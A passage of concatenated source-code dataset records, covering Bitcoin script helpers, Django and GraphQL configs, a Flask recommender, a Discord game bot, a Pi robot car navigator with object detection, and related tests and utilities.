script_pub_key from key(s)/script\n\n\ndef p2pk(key: Key) -> bytes:\n    \"Return the p2pk script_pub_key of the provided key.\"\n\n    payload, _ = pub_keyinfo_from_key(key)\n    return script_pub_key_from_payload(\"p2pk\", payload)\n\n\ndef p2ms(\n    m: int, keys: List[Key], lexi_sort: bool = True, compressed: Optional[bool] = None\n) -> bytes:\n    \"\"\"Return the m-of-n multi-sig script_pub_key of the provided keys.\n\n    BIP67 endorses lexicographical key sorting\n    according to compressed key representation.\n\n    Note that sorting uncompressed keys (leading 0x04 byte) results\n    in a different order than sorting the same keys in compressed\n    (leading 0x02 or 0x03 bytes) representation.\n\n    https://github.com/bitcoin/bips/blob/master/bip-0067.mediawiki\n    \"\"\"\n    m += 80\n    payload = m.to_bytes(1, byteorder=\"big\", signed=False)\n    pub_keys = [pub_keyinfo_from_key(k, compressed=compressed)[0] for k in keys]\n    if lexi_sort:\n        pub_keys = sorted(pub_keys)\n    payload += b\"\".join([var_bytes.serialize(k) for k in pub_keys])\n    n = len(keys) + 80\n    payload += n.to_bytes(1, byteorder=\"big\", signed=False)\n    return script_pub_key_from_payload(\"p2ms\", payload)\n\n\ndef nulldata(data: String) -> bytes:\n    \"Return the nulldata script_pub_key of the provided data.\"\n\n    if isinstance(data, str):\n        # do not strip spaces\n        data = data.encode()\n\n    return script_pub_key_from_payload(\"nulldata\", data)\n\n\ndef p2pkh(key: Key, compressed: Optional[bool] = None) -> bytes:\n    \"Return the p2pkh script_pub_key of the provided key.\"\n\n    pub_key_h160, _ = hash160_from_key(key, compressed=compressed)\n    return script_pub_key_from_payload(\"p2pkh\", pub_key_h160)\n\n\ndef p2sh(redeem_script: Octets) -> bytes:\n    \"Return the p2sh script_pub_key of the provided redeem script.\"\n\n    script_h160 = hash160(redeem_script)\n    return script_pub_key_from_payload(\"p2sh\", script_h160)\n\n\ndef p2wpkh(key: Key) -> bytes:\n    \"\"\"Return the p2wpkh script_pub_key of the provided key.\n\n    If the provided key is a public one, it must be compressed.\n    \"\"\"\n\n    pub_key_h160, _ = hash160_from_key(key, compressed=True)\n    return script_pub_key_from_payload(\"p2wpkh\", pub_key_h160)\n\n\ndef p2wsh(redeem_script: Octets) -> bytes:\n    \"Return the p2wsh script_pub_key of the provided redeem script.\"\n\n    script_h256 = sha256(redeem_script)\n    return script_pub_key_from_payload(\"p2wsh\", script_h256)\n","sub_path":"btclib/script_pub_key.py","file_name":"script_pub_key.py","file_ext":"py","file_size_in_byte":13010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"435921871","text":"from django.conf.urls import patterns\n\nurlpatterns = patterns('relationships_service.views',\n    (r'add_campaign/$', 'add_campaign'),\n    (r'^(?P<ctype>.+?)/(?P<cid>.+?)/$', 'get_relationships'),\n)\n\ndef register_api(v1_api):\n    from relationships_service.api import RelationshipsServiceResource\n    v1_api.register(RelationshipsServiceResource())\n","sub_path":"relationships_service/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"210711291","text":"from flask import Flask\nfrom flask_cors import CORS\nfrom flask import jsonify, make_response, request\nimport json, requests\nimport numpy as np\n\nRETRIEVAL_URL = \"http://localhost:8501/v1/models/retrieval:predict\"\nRANKING_URL = \"http://localhost:8501/v1/models/ranking:predict\"\nNUM_OF_CANDIDATES = 10\n\napp = 
Flask(__name__)\nCORS(app)\n\n\n@app.route(\"/recommend\", methods=[\"POST\"])\ndef get_recommendations():\n user_id = request.get_json()[\"user_id\"]\n retrieval_request = json.dumps({\"instances\": [user_id]})\n retrieval_response = requests.post(RETRIEVAL_URL, data=retrieval_request)\n movie_candidates = retrieval_response.json()[\"predictions\"][0][\"output_2\"]\n\n ranking_queries = [\n {\"user_id\": u, \"movie_title\": m}\n for (u, m) in zip([user_id] * NUM_OF_CANDIDATES, movie_candidates)\n ]\n ranking_request = json.dumps({\"instances\": ranking_queries})\n ranking_response = requests.post(RANKING_URL, data=ranking_request)\n movies_scores = list(np.squeeze(ranking_response.json()[\"predictions\"]))\n ranked_movies = [\n m[1] for m in sorted(list(zip(movies_scores, movie_candidates)), reverse=True)\n ]\n\n return make_response(jsonify({\"movies\": ranked_movies}), 200)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"tfrs-flutter/step3/backend/recommender.py","file_name":"recommender.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"628226573","text":"name = \"eigen\"\n\nversion = \"3.3.7\"\n\nauthors = [\n \"eigenteam\"\n]\n\ndescription = \\\n \"\"\"\n Eigen is a C++ template library for linear algebra: matrices, vectors, numerical solvers, and related algorithms.\n \"\"\"\n\nprivate_build_requires = [\n \"gcc-4.8+<5\",\n]\n\nvariants = [\n [\"platform-linux\", \"arch-x86_64\", \"os-CentOS-7\"]\n]\n\nuuid = \"5d9a247d-7900-4830-a142-60ce1f730b98\"\n\ndef commands():\n if building:\n env.CMAKE_MODULE_PATH.append('{this.root}/share/eigen3/cmake')\n env.PKG_CONFIG_PATH.append('{this.root}/share/pkgconfig')\n","sub_path":"eigen/3.3.7/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"573439637","text":"import unittest\nfrom unittest.mock import patch\nfrom server import app\nimport json\nfrom bson.objectid import ObjectId\n\nfrom resource.model.User import UserModel\n\n\nclass CredentialsMock():\n def __init__(self):\n pass\n\n @property\n def token(self):\n return 'Credentials.token'\n\n @property\n def refresh_token(self):\n return 'Credentials.refresh_token'\n\n @property\n def token_uri(self):\n return 'Credentials.token_uri'\n\n @property\n def client_id(self):\n return 'Credentials.client_id'\n\n @property\n def client_secret(self):\n return 'Credentials.client_secret'\n\n @property\n def scopes(self):\n return 'Credentials.scopes'\n\n\nclass FlowMock():\n def __init__(self):\n self._redirect_uri = None\n self.test = 'test'\n\n @property\n def redirect_uri(self):\n return self._redirect_uri\n\n @redirect_uri.setter\n def redirect_uri(self, uri):\n self._redirect_uri = uri\n\n def fetch_token(self, **kwargs):\n self.credentials = CredentialsMock()\n\n\nclass TestGoogleCredentials(unittest.TestCase):\n api_url = '/api/google/credentials'\n\n def setUp(self):\n app.config['TESTING'] = True\n self.app = app.test_client()\n\n def test_post_when_parameters_isnt_set(self):\n data = self.app.post(TestGoogleCredentials.api_url)\n self.assertEqual(data.status_code, 400)\n\n data = self.app.post(TestGoogleCredentials.api_url, data={\n 'callback_url': 'aaa'\n })\n self.assertEqual(data.status_code, 400)\n\n data = self.app.post(TestGoogleCredentials.api_url, data={\n 'state': 'bbb'\n })\n self.assertEqual(data.status_code, 400)\n\n def 
test_post_when_invalid_parameter(self):\n        data = self.app.post(TestGoogleCredentials.api_url, data={\n            'callback_url': 'http://localhost:5000/',\n            'state': 'bbb'\n        })\n        self.assertEqual(data.status_code, 400)\n\n        data = self.app.post(TestGoogleCredentials.api_url, data={\n            'callback_url': 'https://localhost:5000/',\n            'state': 'bbb'\n        })\n        self.assertEqual(data.status_code, 400)\n\n    @patch('google_auth_oauthlib.flow.Flow.from_client_config')\n    @patch('resource.api.google.credentials.get_userinfo_from_google')\n    def test_post_success(self, mock_get_userinfo, mock_flow):\n        mock_flow.return_value = FlowMock()\n        mock_get_userinfo.return_value = {\n            'email': 'test@gmail.com',\n            'id': '1000'\n        }\n\n        data = self.app.post(TestGoogleCredentials.api_url, data={\n            'callback_url': 'https://localhost:5000/success_using_mock',\n            'state': 'bbb'\n        })\n\n        self.assertEqual(data.status_code, 200)\n\n        dict_data = json.loads(data.get_data())\n        objectid = ObjectId(dict_data['objectid'])\n        user = UserModel()\n        user_data = user.getUser(objectid)\n\n        correct_keys = [\n            '_id', 'token', 'refresh_token', 'token_uri',\n            'client_id', 'client_secret', 'scopes', 'email', 'id'\n        ]\n\n        for index, value in enumerate(user_data):\n            data = user_data[value]\n            self.assertTrue(value in correct_keys)\n\n            if type(data) is ObjectId:\n                data = str(data)\n\n            self.assertGreater(len(data), 0)\n","sub_path":"app/tests/api/google/test_credentials.py","file_name":"test_credentials.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"328019727","text":"import os\nimport pandas as pd\nimport numpy as np\n\nclass CSV():\n    def __init__(self, path, name):\n        self.name = name\n        self.path = path\n        self.csv = pd.read_csv(self.path)\n\nclass CSVsProcessor():\n    def __init__(self, path):\n        self.pages = {}\n        self.input_data = path\n        self.csvs=[]\n        self.data_dir = path\n        for file in os.listdir(self.data_dir):\n            if file.endswith(\".csv\"):\n                self.csvs.append(CSV(os.path.join(self.data_dir, file), file[:-4]))\n\n    def processCSVFiles(self):\n        for csv in self.csvs:\n            pages_list =[]\n            for index, row in csv.csv.iterrows():\n                pages_list.append(row['URLs_to_scrap'])\n            self.pages[csv.name] = pages_list\n\n    def processURLsToGroupNames(self):\n        for key in self.pages:\n            for index in range(len(self.pages[key])):\n                self.pages[key][index]=self.pages[key][index].replace(\"https://www.facebook.com/\", \"\")[:-1]\n\n    def process(self):\n        \"\"\"Makes a dict with the file name as key (genre) and a list of page names as values, for all\n        .csv files stored in the self.data_dir path\"\"\"\n        self.processCSVFiles()\n        self.processURLsToGroupNames()\n\n    def dumpData(self):\n        return self.pages\n","sub_path":"PplOpinion/UtillsAndSettings/CSVReader.py","file_name":"CSVReader.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"252815359","text":"import datetime\n\nfrom modules.base import BaseClass\nfrom modules.deeptown.api import Api\nfrom modules.deeptown.optimizer import Optimizer\n\nitem_type_priority = {\n    \"quest\": 00,\n    \"crafted\": 50,\n    \"chemical\": 60,\n    'organic': 70,\n    \"raw\": 100,\n}\n\nOR = \"5923174042d9bb579ca0ed55\"\nARGENT = \"5953ed2369ce4943b24c40a5\"\nFER = \"596ec7259e64a9589c0621d3\"\nCOOKIES = \"59b3ae22575c777d1dfcd87b\"\n\nguilds = {\n    \"or\": OR,\n    \"ors\": OR,\n    \"argent\": ARGENT,\n    \"argents\": ARGENT,\n    \"fer\": FER,\n    \"fers\": FER,\n    \"cookie\": 
COOKIES,\n \"cookies\": COOKIES\n}\n\n\nclass MainClass(BaseClass):\n name = \"deeptown\"\n command_text = \"deeptown\"\n help = {\n \"description\": \"Commandes relatives à deeptown\",\n \"commands\": {\n \"`{prefix}{command} to_make [=1]`\": \"Affiche les ressources nécessaire pour faire l'item \"\n \" fois.\",\n \"`{prefix}{command} to_make_recursive [=1]`\": \"Affiche toutes les ressources nécessaires pour \"\n \"faire fois l'objet de manière \"\n \"récursive.\",\n \"`{prefix}{command} best_place_mine `\": \"Affiche les 10 meilleurs emplacements pour le minerais \"\n \".\",\n # \"`{prefix}{command} reload_data`\": \"Recharge les données à partir du site deeptownguide.com\",\n \"`{prefix}{command} leaderboard `\": \"Affiche le classement des joueurs dans la guilde \"\n \" (or, argent, fer, cookies uniquement, \"\n \"données mise à jour toutes les 5 minutes)\"\n }\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.optimizer = Optimizer()\n self.api = Api()\n\n async def com_leaderboard(self, message, args, kwargs):\n if len(args) == 1:\n await message.channel.send(\"Vous devez spécifier la guilde (or, argent, fer, cookie).\")\n return\n elif args[1] not in guilds.keys():\n await message.channel.send(\"La guilde doit être or, argent, fer ou cookie\")\n return\n guild_id = guilds[args[1]]\n guild = await self.api.get_guild(guild_id)\n await guild.get_data()\n guild.members.sort(key=lambda x: -x.last_event_donation)\n text = f\"Voici le classement de la guilde {guild.name}:\\n\"\n lines = []\n max_username = max([len(member.username) for member in guild.members])\n for member in guild.members:\n lines.append(f\"{member.username.ljust(max_username)} - {member.last_event_donation} / {member.last_online}\"\n f\" / {member.level} / {member.depth}\\n\")\n await message.channel.send(text)\n while len(lines) >= 10:\n text = \"```\"\n text += \"\".join(lines[:10])\n for i in range(min(10, len(lines))): lines.pop(0)\n text += \"```\"\n await message.channel.send(text)\n\n async def com_best_place_mine(self, message, args, kwargs):\n if len(args) == 1:\n await message.channel.send(\"Il faut spécifier au moins un minerais.\")\n return\n if args[1] not in self.optimizer.mines[\"0\"].keys():\n await message.channel.send(f\"Le minerais {args[1]} n'existe pas\")\n return\n text = f\"Voici les 10 meilleurs emplacements pour le minerais {args[1]}:```\"\n i = 0\n for mine in self.optimizer.best_mines(args[1]):\n if i >= 10:\n break\n if mine[0] == \"0\":\n continue\n text += mine[0].center(3, \" \")\n text += \": \"\n text += str(mine[1][args[1]] * 100)\n text += \"%\\n\"\n i += 1\n text += \"```\"\n await message.channel.send(text)\n return\n\n async def com_to_make(self, message, args, kwargs):\n if len(args) == 1:\n await message.channel.send(\"Il faut au moins spécifier le nom de l'objet.\")\n return\n if len(args) == 2:\n args.append(\"1\")\n if args[1] not in self.optimizer.items.keys():\n await message.channel.send(f\"L'objet {args[1]} n'est pas un objet valide\")\n return\n try:\n quantity = int(args[2])\n except ValueError:\n await message.channel.send(f\"La quantité {args[2]} n'est pas un entier.\")\n return\n result = self.optimizer.to_make(args[1], quantity)\n time = datetime.timedelta(seconds=int(result[\"time\"]))\n needed = \", \".join([str(quantity) + \" \" + name for name, quantity in result[\"needed\"].items()])\n await message.channel.send(f\"Pour faire {quantity} {args[1]} il faudra {time}. Il vous faudra {needed}. 
La \"\n f\"valeur totale de la production est de {result['value']}.s\")\n\n async def com_to_make_recursive(self, message, args, kwargs):\n if len(args) == 1:\n await message.channel.send(\"Vous devez spécifier au moins le nom de l'objet.\")\n return\n if len(args) == 2:\n args.append(\"1\")\n if args[1] not in self.optimizer.items.keys():\n await message.channel.send(f\"L'objet {args[1]} n'existe pas.\")\n return\n try:\n quantity = int(args[2])\n except ValueError:\n await message.channel.send(f\"La quantité {args[2]} n'est pas valide.\")\n return\n needed = self.optimizer.recursive_to_make(args[1], quantity)\n texte = f\"Pour faire {quantity} de {args[1]} vous aurez besoin de:```\"\n needed.sort(key=lambda x: item_type_priority[x[0]])\n for item in needed[1:]:\n texte += \"\\n\"\n texte += \"{item:20} | {quantity:8} | {time}\".format(item=item[1],\n quantity=item[2],\n time=datetime.timedelta(seconds=int(item[3])))\n texte += \"```\"\n await message.channel.send(texte)\n","sub_path":"modules/deeptown/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"346851119","text":"#create prime numbers set\ns={2,1,8,7,9,5,6}\nprint(s)\nprime=set()\nnonprime=set()\nfor i in s:\n if(i>1):\n for j in range(2,i):\n if(i%j==0):\n nonprime.add(i)\n break\n else:\n prime.add(i)\nprint(\"prime\",prime)\nprint(\"nonprime\",nonprime)\n\n\n","sub_path":"data collections/prime numbers.py","file_name":"prime numbers.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"571771497","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport io, re, time, heapq, picamera\n\nimport numpy as np\nimport picar_4wd as fc\n\nfrom astar import AStar, MinTurns\nfrom PIL import Image\nfrom tflite_runtime.interpreter import Interpreter\n\nCAMERA_WIDTH = 800\nCAMERA_HEIGHT = 450\nLABEL = \"tflite/coco_labels.txt\"\nMODEL = \"tflite/detect.tflite\"\nTHRES = 0.40\nOBJDT = 0.300\n\nINC = 10\nPOW = 30\nAGL = 0.740\nAGR = 0.710\nFCM = 0.025\n\nSTART = (100,50)\n\ndef main():\n\t\n\ttime.sleep(5)\n\n\tdist = getDist()\n\tmap = getMap(dist)\n\tnp.savetxt(\"maps/map8.csv\", map, fmt='%i', delimiter=\",\")\t\n\n\tgoal = (0,0)\n\tturns, route = getRoute(map, goal)\n\tnp.savetxt(\"maps/route8.csv\", route, fmt='%i', delimiter=\",\")\n\t\n\tnaviCar(turns)\n\t\n\ndef getDist():\n\tdisa = []\n\tfor a in range(-90, 100, INC):\n\t\tdisa.append(fc.get_distance_at(a))\n\t#print(\"DistanceA: \", disa)\n\t\n\tdisb = []\n\tfor b in range(90, -100, -INC):\n\t\tdisb.append(fc.get_distance_at(b))\n\t#print(\"DistanceB: \", disb)\n\t\n\tdist = []\n\tfor c in range(len(disa)):\n\t\tdist.append(min(disa[c],disb[len(disa)-1-c]))\n\tprint(\"Distances: \", dist)\n\t\n\tfc.servo.set_angle(0)\n\t\n\treturn dist\n\n\ndef getMap(dist):\n\tw = 101\n\th = 101\n\tp = 10\n\tb = 0\n\tpdy = p*2 + b + 1\n\tpdx = p*2 + 1\n\t\n\tmap = np.zeros((h,w))\n\tfor i in range(len(dist)):\n\t\tif dist[i] != -2:\n\t\t\t# convert polar to cartesian coordinates\n\t\t\ty=(h-1)-int(round(dist[i]*np.sin((i*INC)*np.pi/180)))\n\t\t\tx=int(w/2)+int(round(dist[i]*np.cos((i*INC)*np.pi/180)))\n\t\t\t#print([dist[i],-90+i*INC,y,x])\n\t\t\t\n\t\t\t# mark coordinates on map\n\t\t\tif 0 <= y < h and 0 <= x < w:\n\t\t\t\tmap[y][x] = 2\n\t\t\t\t\n\t\t\t\t# add padding and mark them\n\t\t\t\tfor m in 
range(pdy):\n\t\t\t\t\tif (y-p-b)+m < 0 or (y-p-b)+m > h-1:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tfor n in range(pdx):\n\t\t\t\t\t\tif (x-p)+n < 0 or (x-p)+n > w-1:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tif map[(y-p-b)+m][(x-p)+n] != 2:\n\t\t\t\t\t\t\tmap[(y-p-b)+m][(x-p)+n] = 1\n\t\n\treturn map\n\n\ndef getRoute(map, goal):\n\t# convert marked map for A* algorithm\n\tmpn = [\"\" for i in range(len(map))]\n\tfor j in range(len(map)):\n\t\tfor i in map[j]:\n\t\t\tmpn[j] += str(int(i))\n\t\n\t# find best route with minimum direction changes\n\tturns = MinTurns(START, goal, mpn).search()\n\tturns.append(goal)\n\tprint(\"Turns: \", turns)\n\t\n\t# create complete route with coordinates\n\tcur = START\n\troute = []\n\tfor t in turns:\n\t\ty = t[0] - cur[0]\n\t\tx = t[1] - cur[1]\n\t\tif y > 0:\n\t\t\tfor j in range(y):\n\t\t\t\troute.append((cur[0]+j,cur[1]))\n\t\tif y < 0:\t\n\t\t\tfor j in range(-y):\n\t\t\t\troute.append((cur[0]-j,cur[1]))\n\t\tif x > 0:\n\t\t\tfor i in range(x):\n\t\t\t\troute.append((cur[0],cur[1]+i))\n\t\tif x < 0:\t\n\t\t\tfor i in range(-x):\n\t\t\t\troute.append((cur[0],cur[1]-i))\n\t\tcur = t\n\t\t\n\troute.append(goal)\n\t#print(\"Route: \", route)\n\t\n\t# mark route coordinates\n\tfor r in route:\n\t\tmap[r[0]][r[1]] = 9\n\t\n\treturn turns, map\n\n\ndef naviCar(turns):\n\t\n\tlabels = load_labels(LABEL)\n\tinterpreter = Interpreter(MODEL, num_threads=3)\n\tinterpreter.allocate_tensors()\n\t_, input_height, input_width, _ = interpreter.get_input_details()[0]['shape']\n\n\tcamera = picamera.PiCamera(\n\t\t\tresolution=(CAMERA_WIDTH, CAMERA_HEIGHT), framerate=90)\n\tcamera.rotation = 180\n\tcamera.video_stabilization = True \n\t\n\tdir = []\n\to = START\n\td = 'F'\n\tid = 0\n\n\tfor t in turns:\n\t\t\n\t\t#print(\"==========>\", t)\n\t\t\n\t\tdy = t[0] - o[0]\n\t\tdx = t[1] - o[1]\n\t\t\n\t\tif dy == 0 and dx > 0:\n\t\t\tdir.append('R')\n\t\t\tif d == 'B' or d == 'F':\n\t\t\t\tfc.turn_right(POW)\n\t\t\t\ttime.sleep(AGR)\n\t\t\td = 'R'\n\t\t\t\n\t\tif dy == 0 and dx < 0:\n\t\t\tdir.append('L')\n\t\t\tif d == 'B' or d == 'F':\t\n\t\t\t\tfc.turn_left(POW)\n\t\t\t\ttime.sleep(AGL)\n\t\t\td = 'L'\n\t\t\t\n\t\tif dy > 0 and dx == 0:\n\t\t\tdir.append('B')\n\t\t\tif d == 'L':\n\t\t\t\tfc.turn_right(POW)\n\t\t\t\ttime.sleep(AGR)\n\t\t\tif d == 'R':\t\n\t\t\t\tfc.turn_left(POW)\n\t\t\t\ttime.sleep(AGL)\n\t\t\td = 'B'\n\t\t\t\n\t\tif dy < 0 and dx == 0:\n\t\t\tdir.append('F')\n\t\t\tif d == 'L':\n\t\t\t\tfc.turn_right(POW)\n\t\t\t\ttime.sleep(AGR)\n\t\t\tif d == 'R':\t\n\t\t\t\tfc.turn_left(POW)\n\t\t\t\ttime.sleep(AGL)\n\t\t\td = 'F'\n\t\t\t\n\t\tfc.stop()\n\t\t\n\t\t# object detect to start\n\t\tid += 1\n\t\ttStart = time.monotonic()\n\t\timage = getImage(input_height, input_width, camera, id)\n\t\tresults = detect_objects(interpreter, image, THRES)\n\t\ttRef = getRespond(results, labels, 0) + (time.monotonic() - tStart)\n\t\t\n\t\ttBuffer = OBJDT\n\t\ttRemain = FCM * abs(dy+dx)\n\t\ttElapsed = 0\n\t\ttDrive = 0\n\t\t\n\t\tprint('Reference Time: %.3f' % tRef)\n\t\tprint('Initial Remaining Time: %.3f' % tRemain)\n\t\t\n\t\tfc.forward(POW)\n\t\t\n\t\twhile tRemain - max(tElapsed, tBuffer) > 0:\n\t\t\ttStart = time.monotonic()\n\t\t\timage = getImage(input_height, input_width, camera, 0)\n\t\t\tresults = detect_objects(interpreter, image, THRES)\n\t\t\ttElapsed = (time.monotonic() - tStart) + getRespond(results, labels, 1)\n\t\t\ttDrive += tElapsed\n\t\t\t#tRemain -= max(tElapsed, tBuffer)\n\t\t\ttRemain -= tElapsed\n\t\t\tprint('Loop Elapsed | Remain Time: %.3f | %.3f' % (tElapsed, 
tRemain))\n\t\t\n\t\ttime.sleep(tRemain)\n\t\tprint('Turn Drive Time: %.3f' % (tDrive+tRemain))\n\t\t\n\t\to = t\n\t\n\tfc.stop()\n\tprint(\"Direction: \", dir)\n\tcamera.close()\n\n\ndef getRespond(results, labels, action):\n\n\ttCheck = time.monotonic()\n\t#tUsed = 0\n\t\n\tstopsign = 0\n\tbicycle = 0\n\t\n\tobjects = []\n\tfor obj in results:\n\t\tobjects.append(labels[obj['class_id']])\n\t\tif labels[obj['class_id']] == 'stop sign':\n\t\t\tstopsign = 1\n\n\t\tif labels[obj['class_id']] == 'bicycle':\n\t\t\tbicycle = 1\n\t\t\n\tif action == 1:\n\t\tif stopsign == 1:\n\t\t\tprint(\"Stop Here!!\")\n\t\t\ttime.sleep(0.1)\n\t\t\tfc.stop()\n\t\t\t#tUsed += time.monotonic() - tCheck \n\t\t\ttime.sleep(2)\n\t\t\ttCheck = time.monotonic()\n\t\t\tfc.forward(POW)\n\t\t\tstopsign = 0\n\t\t\tprint(\"Objects: \", objects)\t\n\t\t\t\n\t\tif bicycle == 1:\n\t\t\tprint(\"Slow Down!!\")\n\t\t\t#tUsed += time.monotonic() - tCheck \n\t\t\ttime.sleep(0.1)\n\t\t\tfc.stop()\n\t\t\ttime.sleep(0.2)\n\t\t\tfc.forward(POW/3)\n\t\t\ttime.sleep(1)\n\t\t\tfc.stop()\n\t\t\ttime.sleep(0.2)\n\t\t\ttCheck = time.monotonic() - 1\n\t\t\tfc.forward(POW)\n\t\t\tbicycle = 0\n\t\t\tprint(\"Objects: \", objects)\t\t\n\t\n\t#tUsed += time.monotonic() - tCheck\n\treturn time.monotonic() - tCheck\n\n\ndef getImage(input_height, input_width, camera, id):\t\n\t\n\tstream = io.BytesIO()\n\t\n\tif id > 0:\n\t\tcamera.capture('imgs/capture%d.jpg' % id, use_video_port=True)\n\t\n\tcamera.capture(stream, format='jpeg', use_video_port=True)\n\t\n\tstream.seek(0)\n\timage = Image.open(stream).convert('RGB').resize(\n\t\t\t(input_width, input_height), Image.ANTIALIAS)\n\t\n\tstream.truncate()\n\t\n\treturn image\n\t\n\ndef load_labels(path):\n\t\"\"\"Loads the labels file. Supports files with or without index numbers.\"\"\"\n\twith open(path, 'r', encoding='utf-8') as f:\n\t\tlines = f.readlines()\n\t\tlabels = {}\n\t\tfor row_number, content in enumerate(lines):\n\t\t\tpair = re.split(r'[:\\s]+', content.strip(), maxsplit=1)\n\t\t\tif len(pair) == 2 and pair[0].strip().isdigit():\n\t\t\t\tlabels[int(pair[0])] = pair[1].strip()\n\t\t\telse:\n\t\t\t\tlabels[row_number] = pair[0].strip()\n\treturn labels\n\n\ndef set_input_tensor(interpreter, image):\n\t\"\"\"Sets the input tensor.\"\"\"\n\ttensor_index = interpreter.get_input_details()[0]['index']\n\tinput_tensor = interpreter.tensor(tensor_index)()[0]\n\tinput_tensor[:, :] = image\n\n\ndef get_output_tensor(interpreter, index):\n\t\"\"\"Returns the output tensor at the given index.\"\"\"\n\toutput_details = interpreter.get_output_details()[index]\n\ttensor = np.squeeze(interpreter.get_tensor(output_details['index']))\n\treturn tensor\n\n\ndef detect_objects(interpreter, image, threshold):\n\t\"\"\"Returns a list of detection results, each a dictionary of object info.\"\"\"\n\tset_input_tensor(interpreter, image)\n\tinterpreter.invoke()\n\n\t# Get all output details\n\tboxes = get_output_tensor(interpreter, 0)\n\tclasses = get_output_tensor(interpreter, 1)\n\tscores = get_output_tensor(interpreter, 2)\n\tcount = int(get_output_tensor(interpreter, 3))\n\n\tresults = []\n\tfor i in range(count):\n\t\tif scores[i] >= threshold:\n\t\t\tresult = {\n\t\t\t\t'bounding_box': boxes[i],\n\t\t\t\t'class_id': classes[i],\n\t\t\t\t'score': scores[i]\n\t\t\t}\n\t\t\tresults.append(result)\n\treturn results\n\t\n\t\nif __name__ == \"__main__\":\n 
main()\n","sub_path":"picar.py","file_name":"picar.py","file_ext":"py","file_size_in_byte":7763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"562352977","text":"\nimport graphene\nfrom graphene import relay\nfrom graphene_django.types import DjangoObjectType\nfrom graphene_django.filter import DjangoFilterConnectionField\n\nfrom .models import Category, Ingredient, Recipe, Cookbook\n\n\nclass CategoryNode(DjangoObjectType):\n class Meta:\n model = Category\n filter_fields = ['name',]\n interfaces = (relay.Node,)\n\n\nclass IngredientNode(DjangoObjectType):\n class Meta:\n model = Ingredient\n filter_fields = {\n 'name': ['exact', 'contains', 'startswith', 'endswith'],\n 'notes': ['exact', 'contains'],\n 'category': ['exact'],\n 'category__name': ['exact'],\n }\n interfaces = (relay.Node,)\n\n\nclass RecipeNode(DjangoObjectType):\n class Meta:\n model = Recipe\n filter_fields = {\n 'name': ['exact', 'contains', 'startswith', 'endswith'],\n 'author': ['exact'],\n 'author__username': ['exact', 'contains'],\n 'created_at': ['exact', 'gt', 'lt', 'gte', 'lte'],\n 'last_updated': ['exact', 'gt', 'lt', 'gte', 'lte'],\n 'servings': ['exact', 'gt', 'lt', 'gte', 'lte'],\n 'serving_size': ['exact', 'contains'],\n 'prep_time': ['exact', 'gt', 'lt', 'gte', 'lte'],\n 'cook_time': ['exact', 'gt', 'lt', 'gte', 'lte'],\n 'ingredients': ['contains'],\n 'instructions': ['contains'],\n 'fork': ['exact'],\n 'fork__name': ['exact', 'contains', 'startswith', 'endswith'],\n }\n interfaces = (relay.Node,)\n\n\nclass CookbookNode(DjangoObjectType):\n class Meta:\n model = Cookbook\n filter_fields = {\n 'name': ['exact', 'contains', 'startswith', 'endswith'],\n 'author': ['exact'],\n 'author__username': ['exact', 'contains'],\n 'created_at': ['exact', 'gt', 'lt', 'gte', 'lte'],\n 'last_updated': ['exact', 'gt', 'lt', 'gte', 'lte'],\n 'recipes': ['contains'],\n 'description': ['contains'],\n 'fork': ['exact'],\n 'fork__name': ['exact', 'contains', 'startswith', 'endswith'],\n }\n interfaces = (relay.Node,)\n\n\nclass Query(graphene.AbstractType):\n category = relay.Node.Field(CategoryNode)\n categories = DjangoFilterConnectionField(CategoryNode)\n\n ingredient = relay.Node.Field(IngredientNode)\n ingredients = DjangoFilterConnectionField(IngredientNode)\n\n recipe = relay.Node.Field(RecipeNode)\n recipes = DjangoFilterConnectionField(RecipeNode)\n\n cookbook = relay.Node.Field(CookbookNode)\n cookbooks = DjangoFilterConnectionField(CookbookNode)\n","sub_path":"chefql/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"367923973","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import division\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom model import MIR4SR\r\nfrom utils import Data\r\nimport pickle\r\nimport argparse\r\nimport time\r\nimport math\r\n\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--dataset', default='yoochoose')\r\nparser.add_argument('--method', type=str, default='sat', help='session encoder method')\r\nparser.add_argument('--model_path', type=str, default='./exp/yoochoose/model/model')\r\nparser.add_argument('--batch_size', type=int, default=512, help='input batch size')\r\nparser.add_argument('--hidden_size', type=int, default=100, help='hidden state size')\r\nparser.add_argument('--emb_size', type=int, default=100, help='hidden state size')\r\nparser.add_argument('--nonhybrid', 
